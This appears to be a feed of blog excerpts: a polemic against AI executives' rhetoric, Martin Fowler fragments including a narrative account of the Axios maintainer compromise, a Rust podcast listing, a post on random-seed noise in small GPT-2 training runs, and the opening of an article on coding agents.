Both he and Mr. Amodei need to immediately stop overstating the capabilities of Large Language Models. Mr. Altman and Mr. Amodei should not discuss being “scared” of their models, or being “uncomfortable” that men such as they are in control (unless they wish to shut down their services), or say that they “don’t know if models are conscious.” They should immediately stop misleading people through company documentation claiming that models are “blackmailing” people or, as Anthropic did in its Mythos system card, suggesting a model has “broken containment and sent a message” when it A) was instructed to do so and B) did not actually break out of any container. They must stop discussing threats to jobs without actual meaningful data that is significantly more sound than “jobs that might be affected someday, but for now we’ve got a chatbot.” Mr. Amodei should immediately cease any and all discussion of AI potentially or otherwise eliminating 50% of white-collar jobs, Mr. Altman should cease predicting when Superintelligence might arrive, and Mr. Amodei should actively reject and denounce any suggestion of AI “creating a white collar bloodbath.”

Those that defend AI labs will claim that these are “difficult conversations that need to be had,” when in actuality they engage in dangerous and frightening rhetoric as a means of boosting a company’s valuation and garnering attention. If either of these men truly believed these things were true, they would do something about it other than saying “you should be scared of us and the things we’re making, and I’m the only one brave enough to say anything.”

These conversations are also nonsensical and misleading when you compare them to what Large Language Models can actually do, and this rhetoric is a blatant attempt to scare people into paying for software today based on what it absolutely cannot and will not do in the future. It is an attempt to obfuscate the actual efficacy of a technology as a means of deceiving investors, the media and the general public.

Both Altman and Amodei engage in the language of AI doomerism as a means of generating attention, revenue and investment capital, actively selling their software and future investment potential based on their ownership of a technology that they say (disingenuously) is potentially going to take everybody’s jobs.
Based on reports from his Instagram, the man who threw the Molotov cocktail at Sam Altman’s house was at least partially inspired by If Anyone Builds It, Everyone Dies, a doomer porn fantasy written by a pair of overly-verbose dunces spreading fearful language about the power of AI, inspired in turn by the fearmongering of Altman himself. Altman suggested in 2023 that one of the authors might deserve the Nobel Peace Prize. I only see one side engaged in dangerous rhetoric, and it’s the one that has the most to gain from spreading it.

I need to be clear that this act of violence is not something I endorse in any way, and I am glad that nobody was hurt. I also think we need to be clear about the circumstances — and the rhetoric — that led somebody to do this, and why the AI industry needs to be well aware that the society it keeps threatening with job loss is full of people who are very, very close to the edge. This is not about anybody being “deserving” of anything, but a frank evaluation of cause and effect.

People feel like they’re being fucking tortured every time they load social media. Their money doesn’t go as far. Their financial situation has never been worse. Every time they read something, it’s a story about ICE patrols, or a near-nuclear war in Iran, or gas getting more expensive, or worrying things happening in private credit. Nobody can afford a house, and layoffs are constant.

One group, however, appears to exist in an alternative world where anything they want is possible. They can raise as much money as they want. They can build as big a building as they want, anywhere in the world. Everything they do is taken so seriously that the government will call a meeting about it. Every single media outlet talks about everything they do. Your boss forces you to use it. Every piece of software forces you to at least acknowledge that it uses it too. Everyone talks about it with complete certainty, despite it not being completely clear why. As many people writhe in continual agony and fear, AI promises — but never quite delivers — some sort of vague utopia at the highest cost known to man. And these companies are, in no uncertain terms, coming for your job.

That’s what they want to do. They all say it. They use deceptively-worded studies about “AI-exposed” careers to scare and mislead people into believing LLMs are coming for their jobs, all while spreading vague proclamations about how said job loss is imminent but also always 12 months away. Altman even says that the jobs that will vanish weren’t real work to begin with, much as former OpenAI CTO Mira Murati said that some creative jobs shouldn’t have existed in the first place.

These people, who sell a product with no benefit comparable on any level to its ruinous, trillion-dollar cost, are able to get anything they want at a time when those who work hard are given a kick in the fucking teeth, sneered at for not “using AI” that doesn’t actually seem to make their lives easier, and then told that their labor doesn’t constitute “real work.” At a time when nobody living a normal life feels like they have enough, the AI industry always seems to get more. There’s not enough money for free college or housing or healthcare or daycare, but there’s always more money for AI compute. Regular people face the harshest credit market in generations, but private credit — and specifically data centers — can always get more money and more land.

AI can never fail — it can only be failed.
If it doesn’t work, you simply don’t know how to “use AI” properly and will be “at a huge disadvantage” — despite the sales pitch being “this is intelligent software that just does stuff.” AI companies can get as much attention as they need, their failings explained away, their meager successes celebrated like the ball dropping on New Year’s Eve, their half-assed, sub-War of the Worlds “Mythos” horseshit treated like they’ve opened the gates of Hell.

Regular people feel ignored and not taken seriously, while the people being given the most money and attention are the ones loudly saying “we’re richer than anyone has ever been, we intend to spend more than anyone has ever spent, and we intend to take your job.” Why are they surprised that somebody mentally unstable took them seriously? Did they not think that people would be angry? Constantly talking about how your company will make an indeterminate number of people jobless — while raising over $162 billion in the space of two years and taking up as much space on Earth as you please — is something that could send somebody over the edge. Every day the news reminds you that everything sucks and is more expensive, unless you’re in AI, where you’ll be given as much money as you want and told you’re the most special person alive. I can imagine it tearing at a person’s soul as the world beats them down.

What they did was a disgraceful act of violence. Unstable people in various stages of torment act in erratic and dangerous ways. The suspect in the Molotov cocktail incident apparently had a manifesto listing the names and addresses of both Altman and multiple other AI executives, and, per CNBC, discussed the threat of AI to humanity as a justification for his actions. I am genuinely happy to hear that this person was apprehended without anyone being hurt.

These actions are morally wrong, and they are also the direct result of the AI industry’s deceptive and manipulative scare campaign, one promoted by men like Altman and Amodei, as well as doomer fanfiction writers like Yudkowsky and, of course, Daniel Kokotajlo of AI 2027 — both of whom have had their work validated and propagated via the New York Times.

On the subject of “dangerous rhetoric,” I think we need to reckon with the fact that the mainstream media has helped spread harmful propaganda, and that a lack of scrutiny of said propaganda is causing genuine harm. I also do not hear any attempts by Mr. Altman to deal with the actual, documented threat of AI psychosis, and the people who have been twisted by Large Language Models into taking their lives and those of others. These are acts of violence that could have been stopped had ChatGPT and similar applications not been anthropomorphized by design and trained to be “friendly.”

These dangerous acts of violence were not inspired by Ronan Farrow publishing a piece about Sam Altman. They were caused by a years-long publicity campaign that has, since the beginning, been about how scary the technology is and how much money its owners make. I separately believe that these executives and their cohort are intentionally scaring people as a means of growing their companies, and that their continual statements of “we’re making something to take your job, and we need more money and space to do it” could be construed as a threat by somebody who’s already on edge.

I agree that the dangerous rhetoric around AI must stop.
Dario Amodei and Sam Altman must immediately cease their manipulative and disingenuous scare tactics, and begin describing Large Language Models in terms that match their actual abilities, dispensing with any further attempts to extrapolate their future capabilities. Enough with the fluff. Enough with the bullshit. Stop talking about AGI. Start talking about this like regular old software, because that’s all that ChatGPT is.

In the end, if Altman wants to engage with “good-faith criticism,” he should start acting in good faith. That starts with taking ownership of his role in a global disinformation campaign. It starts with recognizing how the AI industry has sold itself by spreading mythology with the intent of creating unrest and fear. And it starts with Altman and his ilk accepting any kind of responsibility for their actions.

I’m not holding my breath.

Martin Fowler 6 days ago

Fragments: April 9

I mostly link to written material here, but I’ve recently listened to two excellent podcasts that I can recommend. Anyone who regularly reads these fragments knows that I’m a big fan of Simon Willison; his (also very fragmentary) posts have earned a regular spot in my RSS reader. But the problem with fragments, however valuable, is that they don’t provide a cohesive overview of the situation. So his podcast with Lenny Rachitsky is a welcome survey of the state of the world as seen through a discerning pair of eyeballs. He paints a good picture of how programming has changed for him since the “November inflection point”, important patterns for this work, and his concern about the security bomb nestled inside the beast.

My other great listening was on a regular podcast that I listen to, as Gergely Orosz interviewed Thuan Pham - the former CTO of Uber. As with so many of Gergely’s podcasts, they focused on Thuan Pham’s fascinating career direction, giving listeners an opportunity to learn from a successful professional. There’s also an informative insight into Uber’s use of microservices (they had 5,000 of them), and the way high-growth software necessarily gets rewritten a lot (a phenomenon I dubbed Sacrificial Architecture).

❄                ❄                ❄                ❄                ❄

Axios published their post-mortem on their recent supply chain compromise. It’s quite a story: the attackers spent a couple of weeks developing contact with the lead maintainer, leading to a video call where the meeting software indicated something on the maintainer’s system was out of date. That led to the maintainer installing the update, which in fact was a Remote Access Trojan (RAT).

they tailored this process specifically to me by doing the following: they reached out masquerading as the founder of a company they had cloned the companys founders likeness as well as the company itself. they then invited me to a real slack workspace. this workspace was branded to the companies ci and named in a plausible manner. the slack was thought out very well, they had channels where they were sharing linked-in posts, the linked in posts i presume just went to the real companys account but it was super convincing etc. they even had what i presume were fake profiles of the team of the company but also number of other oss maintainers. they scheduled a meeting with me to connect. the meeting was on ms teams. the meeting had what seemed to be a group of people that were involved. the meeting said something on my system was out of date. i installed the missing item as i presumed it was something to do with teams, and this was the RAT. everything was extremely well co-ordinated looked legit and was done in a professional manner.

Simon Willison has a summary and further links.

❄                ❄                ❄                ❄                ❄

I recently bumped into Diátaxis, a framework for organizing technical documentation. I only looked at it briefly, but there’s much to like. In particular I appreciated how it classified four forms of documentation:

Tutorials: to learn how to use the product
How-to guides: for users to follow to achieve particular goals with the product
Reference: to describe what the product does
Explanations: background and context to educate the user on the product’s rationale

The distinction between tutorials and how-to guides is interesting:

A tutorial serves the needs of the user who is at study. Its obligation is to provide a successful learning experience. A how-to guide serves the needs of the user who is at work. Its obligation is to help the user accomplish a task.

I also appreciated its point of pulling explanations out into separate areas. The idea is that other forms should contain only minimal explanations, linking to the explanation material for more depth. That way we keep the flow on the goal and allow the user to seek deeper explanations in their own way. The study/work distinction between explanation and reference mirrors that same distinction between tutorials and how-to guides.
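If it helps to picture the separation, a documentation tree organized along Diátaxis lines might look something like this (a hypothetical layout; Diátaxis prescribes the four forms, not these literal paths):

```
docs/
├── tutorials/      learning-oriented: a guaranteed first success
│   └── getting-started.md
├── how-to/         task-oriented: recipes for the user at work
│   └── deploy-behind-a-proxy.md
├── reference/      information-oriented: what the product does
│   └── cli-options.md
└── explanation/    understanding-oriented: background and rationale
    └── design-rationale.md
```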
❄                ❄                ❄                ❄                ❄

For eight years, Lalit Maganti wanted a set of tools for working with SQLite. But it would be hard and tedious work, “getting into the weeds of SQLite source code, a fiendishly difficult codebase to understand”. So he didn’t try it. But after the November inflection point, he decided to tackle this need. His account of this exercise is an excellent description of the benefits and perils of developing with AI agents.

Through most of January, I iterated, acting as semi-technical manager and delegating almost all the design and all the implementation to Claude. Functionally, I ended up in a reasonable place: a parser in C extracted from SQLite sources using a bunch of Python scripts, a formatter built on top, support for both the SQLite language and the PerfettoSQL extensions, all exposed in a web playground.

But when I reviewed the codebase in detail in late January, the downside was obvious: the codebase was complete spaghetti. I didn’t understand large parts of the Python source extraction pipeline, functions were scattered in random files without a clear shape, and a few files had grown to several thousand lines. It was extremely fragile; it solved the immediate problem but it was never going to cope with my larger vision, never mind integrating it into the Perfetto tools. The saving grace was that it had proved the approach was viable and generated more than 500 tests, many of which I felt I could reuse.

He threw it all away and worked more closely with the AI on the second attempt, with lots of thinking about the design, reviewing all the code, and refactoring with every step.

In the rewrite, refactoring became the core of my workflow. After every large batch of generated code, I’d step back and ask “is this ugly?” Sometimes AI could clean it up. Other times there was a large-scale abstraction that AI couldn’t see but I could; I’d give it the direction and let it execute. If you have taste, the cost of a wrong approach drops dramatically because you can restructure quickly.

He ended up with a working system, and the AI proved its value in allowing him to tackle something that he’d been leaving on the todo pile for years. But even with the rewrite, the AI had its potholes. His conclusion on the relative value of AI in different scenarios:

When I was working on something I already understood deeply, AI was excellent…. When I was working on something I could describe but didn’t yet know, AI was good but required more care…. When I was working on something where I didn’t even know what I wanted, AI was somewhere between unhelpful and harmful…

At the heart of this is that AI works at its best when there is an objectively checkable answer. If we want an implementation that can pass some tests, then AI does a good job. But when it came to the public API:

I spent several days in early March doing nothing but API refactoring, manually fixing things any experienced engineer would have instinctively avoided but AI made a total mess of.

There’s no test or objective metric for “is this API pleasant to use” and “will this API help users solve the problems they have”, and that’s exactly why the coding agents did so badly at it.
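That “objectively checkable answer” point is easy to make concrete. The 500 tests from the first attempt were valuable precisely because a rewrite either reproduces every expected output or it doesn’t. A hypothetical golden-file harness in pytest (format_sql and the myformatter module stand in for the formatter in Maganti’s project):

```python
# Hypothetical golden-file harness: each tests/golden/*.sql input has
# a matching *.expected.sql output. AI-generated changes either
# reproduce every golden file or fail -- an objectively checkable bar.
from pathlib import Path

import pytest

from myformatter import format_sql  # stand-in for the real module

CASES = [p for p in sorted(Path("tests/golden").glob("*.sql"))
         if not p.name.endswith(".expected.sql")]

@pytest.mark.parametrize("case", CASES, ids=lambda p: p.stem)
def test_formats_match_golden(case: Path):
    expected = case.with_suffix(".expected.sql").read_text()
    assert format_sql(case.read_text()) == expected
```

There is no equivalent harness for “is this API pleasant to use”, which is exactly where the agents fell down.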

Corrode 1 week ago

Cloudsmith

Rust adoption can be loud, like when companies such as Microsoft, Meta, and Google announce their use of Rust in high-profile projects. But there are countless smaller teams quietly using Rust to solve real-world problems, sometimes without anyone noticing. This episode tells one such story. Cian and his team at Cloudsmith have been adopting Rust in their Python monolith not because they wanted to rewrite everything in Rust, but because Rust extensions were simply best-in-class for the specific performance problems they were trying to solve in their Django application. As they had these initial successes, they gained more confidence in Rust and started using it in more and more areas of their codebase.

CodeCrafters helps you become proficient in Rust by building real-world, production-grade projects. Learn hands-on by creating your own shell, HTTP server, Redis, Kafka, Git, SQLite, or DNS service from scratch. Start for free today and enjoy 40% off any paid plan by using this link.

Cloudsmith is the fully-managed solution for controlling, securing, and distributing software artifacts. They analyze every package, container, and ML model in an organization's supply chain, allow blocking bad packages before they reach developers, and build an ironclad chain of custody. Made with love in Belfast and trusted around the world.

Cian is a Service Reliability Engineer located in Dublin, Ireland. He has been working with Rust for 10 years and has a history of helping companies build reliable and efficient software. He has a BA in Computer Programming from Dublin City University.

Links from the episode:

Lee Skillen's blog - The blog of Lee Skillen, Cloudsmith's co-founder and CTO
Django - Python on Rails
Django Mixins - Great for scaling up, not great for long-term maintenance
SBOM - Software Bill of Materials
Microservice vs Monolith - Martin Fowler's canonical explanation
Jaeger - "Debugger" for microservices
PyO3 - Rust-to-Python and Python-to-Rust FFI crate
orjson - Pretty fast JSON handling in Python using Rust
drf-orjson-renderer - Simple orjson wrapper for Django REST Framework
Rust in Python cryptography - Parsing complex data formats is just safer in Rust!
jsonschema-py - jsonschema in Python with Rust, mentioned in the PyO3 docs
WSGI - Python's standard for HTTP server interfaces
uWSGI - An application server providing a WSGI interface
rustimport - Simply import Rust files as modules in Python, great for prototyping
granian - WSGI application server written in Rust with tokio and hyper
hyper - HTTP parsing and serialization library for Rust
HAProxy - Feature-rich reverse proxy with good request queue support
nginx - Very common reverse proxy with very nice and readable config
locust - Fantastic load-test tool with configuration in Python
goose - Locust, but in Rust
Podman - Daemonless container engine
Docker - Container platform
buildx - Docker CLI plugin for extended build capabilities with BuildKit
OrbStack - Faster Docker for Desktop alternative
Rust in Production: curl with Daniel Stenberg - Talking about hyper's strictness being at odds with curl's permissive design
axum - Ergonomic and modular web framework for Rust
rocket - Web framework for Rust
Cloudsmith Website
Cian Butler's Website
Cian's E-Mail
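(As a small illustration of the Rust-extensions-in-Python pattern the episode describes, here is how orjson, one of the links above, drops into ordinary Python code; the data values are made up.)

    import json
    import orjson  # Rust-backed JSON library: pip install orjson

    record = {"package": "example-pkg", "version": "1.2.3", "tags": ["rust", "python"]}

    # One small API difference: orjson.dumps returns bytes, not str
    payload: bytes = orjson.dumps(record)

    # The Rust implementation round-trips to the same data as the stdlib parser
    assert orjson.loads(payload) == json.loads(payload)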

Giles's blog 1 week ago

Writing an LLM from scratch, part 32i -- Interventions: what is in the noise?

Towards the end of last year, I trained a 163M-parameter GPT-2-style model from scratch on my local RTX 3090, using code based on Sebastian Raschka's book "Build a Large Language Model (from Scratch)". The result was a pretty decent little model, but it wasn't as good as the original GPT-2-small, despite having more parameters (because it wasn't using weight-tying). Specifically: on a particular test set, my model gave a loss of 3.944 -- quite a lot more than the original GPT-2's 3.500 on the same dataset.

I wanted to see whether I could train a model on my own hardware (or on something that didn't cost too much to rent in the cloud) that got closer to the original model's performance. So over the last few months, I've done a bunch of further training runs, each one testing a specific intervention -- a stand-alone change that I expected to change the loss, either for better or for worse. Specifically:

I trained a baseline model on an 8x A100 40 GiB per GPU machine on Lambda (which was better than my original locally-trained model, I believe due to the larger batch size that the larger machine made possible).
I tried adding gradient clipping to see if that would help by limiting the effects of loss spikes.
I tried removing dropout, given that these days people tend not to use it (because we're doing single-epoch training runs).
I tried adding bias to the attention weight matrices -- something that was popular back in the GPT-2 era, and was used by the original weights, but which my code did not use.
Instead of just using the learning rate of 0.0004 that was used in the code from the book, I looked into what values people use these days, and learned how to schedule it over the course of the training run.
Similarly, I learned more about weight decay and tried some alternative values.
Then I tried making my model more like the original GPT-2 one by introducing weight tying to see if that would help.
Finally, I decided to try training in "full-fat" float32 instead of using PyTorch's AMP and TF32 matrix multiplication performance enhancements.

At the end of all of that, I had a table showing the effect of each intervention in terms of loss on the test set, sorted from least-effective to most-effective, with the baseline included for comparison. Winners and losers are reasonably clear: weight tying and the number for weight decay I derived from a paper by Cerebras Research (probably without understanding it properly) were negatives; full-fat float32, gradient clipping, attention biases, the GPT-2 weight decay parameter, removing dropout, and scheduling (and updating) the learning rate were positives.

So, for an optimal train, we'd just use the effective interventions, right? Well, not quite. Full-fat float32 I decided wasn't worth the effort, as it meant that the train took more than twice as long, and (because it required a larger machine) cost more than three times as much. The others did look like solid changes, but there was one concern.

The effect of each intervention is actually pretty small. For example, gradient clipping reduced the loss by 0.014, from 3.692 to 3.678 -- roughly a 0.4% improvement. Even the best intervention, scheduling the learning rate, only improved things by 2%. Could it be that some or all of these improvements were not real, but just a result of the random nature of training deep neural networks? Could the differences just be in the noise? They seemed small enough for that to be possible.

I've trained seven more models over the last few days to try to get a feel for how big an effect noise has on this kind of training run. The results appear to show that variations in the initial weights matter quite a lot, but randomness in the training loop (given the same initial weights) actually has a fairly minimal impact. That surprised me a bit! Let's go through the details.

When I did the original baseline training run -- creating the model that was the comparison point for all of the interventions -- I wanted to minimise the amount of random-number-induced difference between the training runs in this interventions series. I did this by setting the random seed at the start (a sketch of the code follows below). At the time I wrote it, this seemed pretty complete -- the seed is set on Python's own random number generator, on PyTorch's, and on the separate ones it uses for CUDA. However, in a separate project, where I was fine-tuning a Qwen model as a classifier, I'd found that this wasn't enough: to get full reproducibility, I'd had to lock things down a bit more with some additional determinism settings (also sketched below).

So: was my random number seed code enough for this case? Or would I get a different model if I ran the same code a second time? That was easy enough to check; I spun up a machine and just ran the "baseline" train again. 3 hours 24 minutes later, it had finished -- with, interestingly, exactly the same final train loss as the original baseline train. Here's the model.
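(The actual snippets from the post aren't preserved in this extract, so here is a minimal sketch of what the two pieces of code described above typically look like in PyTorch -- the set_seed wrapper is my naming, and the exact details in the original may differ.)

    import os
    import random
    import torch

    def set_seed(seed: int) -> None:
        # Seed Python's PRNG, PyTorch's CPU PRNG, and the per-device CUDA PRNGs
        random.seed(seed)
        torch.manual_seed(seed)
        torch.cuda.manual_seed_all(seed)

    # The stricter lockdown needed for full run-to-run reproducibility:
    os.environ["CUBLAS_WORKSPACE_CONFIG"] = ":4096:8"  # deterministic cuBLAS kernels
    torch.use_deterministic_algorithms(True)  # error out on non-deterministic ops
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False

    set_seed(42)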
I ran my normal smoke test, asking it to complete "Every effort moves you"... so that was OK -- the model was generating reasonably coherent text. Then I ran the eval to find its loss on the test set: exactly the same as the original baseline! That was certainly promising. Now, the use of three decimal places for the output from the loss eval is just a formatting thing, so I bumped it up to 6 dps and re-ran it for the new model, then against the original baseline model: again, exactly the same. Finally, more out of idle interest than anything else, I decided to see if the models' weights were at least different. That is, quite frankly, amazing to me. I was expecting pretty close results, but what we're seeing here is that two separate models, trained on the same data, but on different machines more than a month apart, have weights that are bit-wise identical. No random noise at all. That's actually really reassuring! It makes me much more comfortable that we're standing on a stable foundation here.

Now it was time to see what effect changing that random seed would have. Let's think about what the random seed does. When we call random.seed(42), we're initialising Python's pseudo-random number generator so that it will start at a particular point -- after we've called it, it will generate the same sequence of "random" numbers each time it's asked for a new one. So the effect of the seed-setting code shown earlier is to initialise three separate pseudo-random number generators to be in a known deterministic state, so they'll all generate the same sequence in every run.

So, the first thing to do was to see what happened if we changed that number. I decided to do two training runs, each with exactly the same code as the baseline, but with different random seeds. Firstly, I changed it from 42 to 22 1 . That training run completed; here's the model. Time for the evals: the smoke test looked fine, and the loss test gave 3.673453 compared to 3.691526 -- an improvement of 0.018 over the run with a seed of 42. That's more than the 0.014 improvement we got from gradient clipping (and indeed, the 0.013 from full-fat float32 training), and quite close to the 0.023 improvement from adding attention weight bias.

Time for another training run with a third seed. Another 3h24m later: here's the model. The smoke test passed, and the test set loss was a further improvement -- 0.038 better than our original baseline, which beats adding attention weight bias (though it's worse than the weight decay update).

Now, three data points is rather a small number for any kind of statistical analysis, but just out of interest, let's do the basics. GeeksForGeeks has a good refresher here if you're a bit rusty. Our mean comes out at ~3.672857, our variance 2 at ~0.00024, and taking the square root of that gives a standard deviation (SD) of ~0.0154919.

So, if we assume a normal distribution, what would that say about our results? Here's the results table again. If we assume that the results are on a normal distribution:

We would expect ~68.2% of results to be within one SD of the mean -- that is, between 3.6573651 and 3.6883489. Interestingly, our actual baseline result is outside that range! But it does include both the gradient clipping and the QKV bias results.
We would additionally expect ~95.4% of the results to be within two SDs, which is 3.6418732 to 3.7038408. That includes our baseline and our weight decay result (though not our experiment removing dropout -- the six-DP loss number for that is 3.641282).
Finally, we'd expect ~99.7% of results to be within three SDs, which is a range from 3.6263813 to 3.7193327. That covers all of our positive results apart from scheduling the learning rate!

That seemed a bit saddening -- were all of the results apart from scheduling the learning rate within the noise? Well, as I said, three data points is too small a number to take those results without a fistful of salt. I was thinking of perhaps trying another few random seeds to see what would happen, and perhaps to tighten those numbers up a bit, but then something occurred to me -- randomness was being used in two different ways in the training run, and perhaps we could separate them? Where do we use the random numbers?
Well, immediately after we set the seeds, we create our uninitialised model for training. One of the random number generators -- Python's, PyTorch's, or one of the CUDA ones -- will be used to generate the initial weights that we're going to start training with. That means that for the same model setup, we'll always start with exactly the same weights. But if the model settings change such that we initialise different things in a different order, then we'll have different weights.

After we've done that, we go into the training loop. That can have randomness in it; although the AdamW optimiser itself is deterministic, we are (in all but one of these training runs) using dropout, which drops a random bunch of activations at various points -- 10% of them with our config. And it seems entirely possible that each of the interventions could change the order of execution of different steps in non-obvious ways, which would lead to dropout being applied in different ways in different runs.

So, the question was: what kinds of randomness -- in terms of the initial weights, or in terms of the training run -- did each intervention potentially change vs the baseline? Disregarding the full-fat float32 run:

Gradient clipping: randomness only affected the training run -- the weights it started with would have been exactly the same as the baseline model's.
Removing dropout: although this is a parameter on the model, I don't think it changes the initial weights. But in the training run, it certainly does affect randomness by removing its use of the random number generator.
Adding bias to the attention weights: this will change both the initial weights -- because we have those bias weights, things will be initialised differently -- and, as a result, the training run, as the random number generator will have been sampled a different number of times prior to the run.
Changing and scheduling the learning rate: this certainly should not change the initial weights, but it might conceivably have a non-obvious effect on training.
Likewise weight decay: no effect I can see on the initial weights, but it could well change training dynamics.
Weight-tying: when I added it to the code, I tried to do so in such a way that the other weights would be unaffected -- I created exactly the same weights as I would without weight tying, then threw away the output head and replaced it with a reference to the input embedding weights. So I think that in theory, this one won't have changed the other model weights (apart from ignoring the initialised-but-thrown-away output head), but it could well have changed the training run.

Given that, I wanted to get two measures of how sensitive to noise each phase of the training run was: the initialisation of weights at the start, and the training run itself.

I decided to start by nailing down exactly what the training run started with. We already had a baseline training run with a specific state of the random number generator at the start; in our "real" baseline, we seeded with 42 at the start, and then initialised our weights. After that, the random number generator would have reached some specific state based on its initial seed and how many numbers had been generated so far. Now, in theory, we could get the RNG into that specific state by seeding it with some number A at that point. We don't know what A is, of course. But it seems vanishingly unlikely that it would be something we'd come up with -- specifically, we can be pretty sure that A ≠ 23 and A ≠ 67.

So, I put the old initial seed of 42 back in, but re-seeded after the model had been initialised (there's a sketch of this two-phase seeding after this section). Firstly, with a re-seed value of 23: I let that run... and got this model, and the normal evals looked fine. Next, I did another training run, the same as the previous one, but with 67 instead of 23 for the re-seed. That one ran, producing this model, which eval'ed fine too 3 . Let's bring those together:

Our normal baseline: weights initialised with seed 42, and training run starts with a "seed" of our imaginary A value from above: 3.691526
The first run above: weights initialised with seed 42, and training run starts with a seed of 23: 3.681356
The second run above: weights initialised with seed 42, and training run starts with a seed of 67: 3.680505

That's a mean of ~3.684462, with a variance of ~0.0000752 and a standard deviation of ~0.008672. Those are tiny compared to the numbers from the two trains we did with the change of the seed prior to the model initialisation. That actually surprised me a bit; we're using dropout in all of these training runs, and it's dropping a random 10% of activations in every forward training pass. With our different training-run starting seeds, they should be getting very different dropout patterns. Hand-wavingly, perhaps over the three million or so sequences we're training on, it averages out? Still a little counterintuitive, though.

Anyway, let's take a look at the intervention results again, this time highlighting the ones that we believe will be starting with the same weights. Using the "99.7% should be within three SDs" heuristic, we get a range of 3.658446 - 3.710478. Of the intervention runs with (I believe) stable weights, only the no-AMP and the gradient clipping ones are within that range. That made me feel quite positive.
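(To make the two-phase seeding concrete, here is a minimal sketch; set_seed is the hypothetical helper from the earlier sketch, and GPTModel, config, and train are stand-in names rather than the post's actual identifiers.)

    set_seed(42)              # weight initialisation is reproducible...
    model = GPTModel(config)  # ...but consumes RNG draws, leaving the generators
                              # in the unknown state "A" described above
    set_seed(23)              # re-seed, pinning the state the training loop starts from
    train(model)              # now only the initial weights depend on the first seed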
If my beliefs are correct about which runs have the same weights, then noise in the training runs seems unlikely to be causing the differences -- that is, perhaps the results from the interventions for those same-weight training runs are real signal and not just noise.

What would happen if, instead of pinning the seed for generating the weights and varying the starting seed for the training run, we varied the weight seed and pinned the training one? We'd already done a training run with a seed of 42 before generating the weights and a re-seed to 23 after that, so I decided to see what would happen if I varied the pre-weights initialisation seed. I let that train... getting this model, and the evals looked fine. Next, one with 67 as the weights-initialisation seed. That trained... getting this model 4 . OK, so here we have: a mean of ~3.673215, a variance of ~0.000145, and an SD of ~0.012062.

Compared to the SD we got when we varied just the initial seed, 0.0154919, it's not too far off. Using the 3-SD rule, we get a range of 3.637030 - 3.709400, and looking at the table again, this time with the ones that we don't expect to have the same weights highlighted, we can see that the QKV bias is well within that range (as are all of the interventions apart from the two negative-effect ones and scheduling the learning rate).

Right, what does all of that tell us? This post obviously isn't even trying to be statistically rigorous. The number of training runs I've done and the amount of data is way too small for that. However, training runs are expensive (Lambda have raised their prices again, so these cost more than US$50 each!), so there's a limit to how much I can do. But even with the limited amount of data, something seems pretty clear:

Varying the random seed at the start, prior to initialising weights, and not constraining the starting point for the training runs, gave a mean of 3.672857, with an SD of 0.0154919.
Keeping the same seed for model weights (so that they all started with the same weights), and varying the seed for the training run, gave a mean of 3.684462, with an SD of 0.008672.
Varying the seed for the model weights (so that they all started with different weights), and keeping the training run seed pinned, gave a mean of 3.673215 and an SD of 0.012062.

"One of these things is not like the others." Keeping the model weights stable and only allowing variation in randomness across the training run itself meant that almost all of the differences between training runs disappeared. Could this be a result of the small number of samples? I guess conceivably it might, but it seems vanishingly unlikely. So I feel reasonably confident in saying that the bulk of the variation in results that we can chalk up to random noise in these training runs comes from variations in the model weights' initialisation.

Additionally, the first training run in this post -- the re-run of the baseline model with no changes -- gave exactly the same numbers as the original baseline run. So we can be confident that all of the models with no changes to the weight initialisation started with the same weights. Of course, I could be wrong about which models really did have the same weights, but given that they were running the same code with the same seed, I'm pretty much sure. That makes me fairly confident that the intervention runs that had the same initial weights gave a real signal about whether or not the intervention in question actually helped. The only exception is gradient clipping, which fell within the three-SD range for the same-weights tests, so its apparent improvement may just be noise -- but it's essentially free, adding just 100 seconds to a three-hour training run.

That's a really interesting result! As I said earlier, given that dropout is making us ignore a random 10% of activations during the training run, I would have thought that changing which random 10% were being ignored would have a much larger effect. And that's not even considering other sources of random noise in the training run. I was less surprised that model weight initialisation was important, though.
It's pretty obvious that your starting position in the loss landscape is going to affect where you end up at the end of the training run. Still, we now have a reasonable level of trust that our interventions gave a real signal, so I think we have everything in place to see how they stack together, and do a best-effort training run. Can we approach the original GPT-2 small weights' performance on our test set loss? It should be fun to find out :-)

Numbers chosen based on a misremembering of this XKCD. For some reason (perhaps because it rhymes) I thought that the old-timey funny number thing was "22 skidoo" rather than "23 skidoo". ↩

On working through this later: with n samples from a dataset, it is (as I understand it) best to use n − 1 as the denominator here (Bessel's correction) for the "sample variance". If we had every possible value, then it would be correct to use n. However, while this changes a few details in the analysis, I don't think it changes the final conclusion of the post meaningfully (it would just bump up the SDs by 22% or so), so I've left it as-is. ↩

I found it interesting that this model does the "you and I" hypercorrection that so many people do when trying to write formally! Based on the (correct) correction of "me and you move back home" to "you and I move back home", I think as a result of excessive pattern-matching. ↩

Another grammatical error based on pattern-matching -- it would make sense that the possessive form of "it" in English was "it's", just like the possessive form of "John" is "John's". ↩

Ahead of AI 1 week ago

Components of A Coding Agent

In this article, I want to cover the overall design of coding agents and agent harnesses: what they are, how they work, and how the different pieces fit together in practice. Readers of my Build a Large Language Model (From Scratch) and Build a Large Reasoning Model (From Scratch) books often ask about agents, so I thought it would be useful to write a reference I can point to. More generally, agents have become an important topic because much of the recent progress in practical LLM systems is not just about better models, but about how we use them. In many real-world applications, the surrounding system, such as tool use, context management, and memory, plays as much of a role as the model itself. This also helps explain why systems like Claude Code or Codex can feel significantly more capable than the same models used in a plain chat interface. In this article, I lay out six of the main building blocks of a coding agent.

You are probably familiar with Claude Code or the Codex CLI, but just to set the stage: they are essentially agentic coding tools that wrap an LLM in an application layer, a so-called agentic harness, to make it more convenient and better-performing for coding tasks.

Figure 1: Claude Code CLI, Codex CLI, and my Mini Coding Agent.

Coding agents are engineered for software work, where the notable parts are not only the model choice but the surrounding system, including repo context, tool design, prompt-cache stability, memory, and long-session continuity. That distinction matters because when we talk about the coding capabilities of LLMs, people often collapse the model, the reasoning behavior, and the agent product into one thing. But before getting into the coding agent specifics, let me briefly provide a bit more context on the difference between the broader concepts: LLMs, reasoning models, and agents.

On The Relationship Between LLMs, Reasoning Models, and Agents

